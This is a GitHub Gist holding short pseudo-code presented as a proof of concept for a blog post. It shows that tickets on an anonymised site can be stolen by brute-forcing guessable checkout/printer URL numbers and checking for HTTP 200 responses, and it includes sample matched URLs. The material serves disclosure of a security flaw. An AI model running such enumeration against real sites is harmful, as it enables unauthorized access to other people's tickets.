Created
May 26, 2012 13:50
-
-
Save anroots/2794030 to your computer and use it in GitHub Desktop.
Pseudo-code, proof-of-concept: tickets are stealable
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Pseudo-code to prove that some tickets are hackable | |
| # Blog post: http://sqroot.eu/2012/05/easily-guessable-uri-s-not-a-good-idea | |
| # Ticket URI, visible to the World: https://www.yyy.ee/et/checkout/printer/XXXXXX/XXXXXXX/ | |
| # Make a HTTPS connection and return the status code of the URI | |
| # 200 means that the ticket exists | |
| def get_http_status_code(ticket_number, print_number): | |
| return url.open(ticket_uri(ticket_number, print_number)).get_status() | |
| # Return the full URI of the ticket | |
| def ticket_uri(ticket_number, print_number): | |
| return "https://www.yyy.ee/et/checkout/printer/"+ticket_number+"/"+print_number | |
| # Check if a ticket exists | |
| def check_ticket(number): | |
| for i in range(1, 9999999): | |
| if (get_http_status_code(number, i) == 200): | |
| print "Ticket match: "+ticket_uri(number, i) | |
| # Main loop | |
| for j in range(100000, 99999999): | |
| check_ticket(j) | |
| # The output of running this would be like so: | |
| # | |
| # $python stealticket.py.py | |
| # Ticket match: https://www.yyy.ee/et/checkout/printer/765812/2387649 | |
| # Ticket match: https://www.yyy.ee/et/checkout/printer/654756/4369801 | |
| # Ticket match: https://www.yyy.ee/et/checkout/printer/533236/3536344 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment